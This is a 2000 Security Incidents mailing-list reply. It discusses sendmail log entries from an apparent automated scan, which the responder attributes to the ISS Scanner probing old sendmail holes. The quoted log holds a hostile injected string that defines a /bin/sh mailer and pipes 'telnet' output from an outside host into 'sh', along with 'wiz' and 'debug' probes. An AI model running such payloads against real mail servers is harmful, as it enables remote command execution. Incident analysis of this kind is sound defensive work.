Security Incidents mailing list archives
Re: sendmail attack?
From: Al Huger - Mail Account <ah1 () SECURITYFOCUS COM>
Date: Thu, 14 Dec 2000 09:32:28 -0800
(xxx.xxx.xxx.xxx) Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx) Dec 9 00:43:01 main sendmail[809]: NOQUEUE: POSSIBLE ATTACK from Dial22.xxx.xxx: newline in string "iss^M Croot^M Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M Mlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u^M R<"|/... Vulnerable | mail ">^M R<"|( sleep 2 ; echo quit ) |telnet xxx.xxx.xxx.xxx 5701 | sh/tmp/tel.out "Dec 9 01:01:05 main sendmail[856]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: vrfy root Dec 9 01:01:06 main sendmail[857]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn root Dec 9 01:01:06 main sendmail[858]: NOQUEUE: Dial22.xxx.xxx [xxx.xxx.xxx.xxx]: expn decode Dec 9 01:01:19 main sendmail[860]: NOQUEUE: "wiz" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx) Dec 9 01:01:24 main sendmail[863]: BAA00863: "debug" command from Dial22.xxx.xxx [xxx.xxx.xxx.xxx] (xxx.xxx.xxx.xxx) =-=-=-=-=-=-=-=-=-=-=-=-=-=- Obviously is a sendmail attack try. Any suggestions, comments ?
That is most likely someone scanning you with the ISS Scanner. I am not clear whether that is the freeware version of the commercial one. Either way, it's an automated scan looking for really, really depracated ancient sendmail holes which I am sure you do not have. -al
Current thread:
- sendmail attack? C (Dec 15)
- Re: sendmail attack? Al Huger - Mail Account (Dec 15)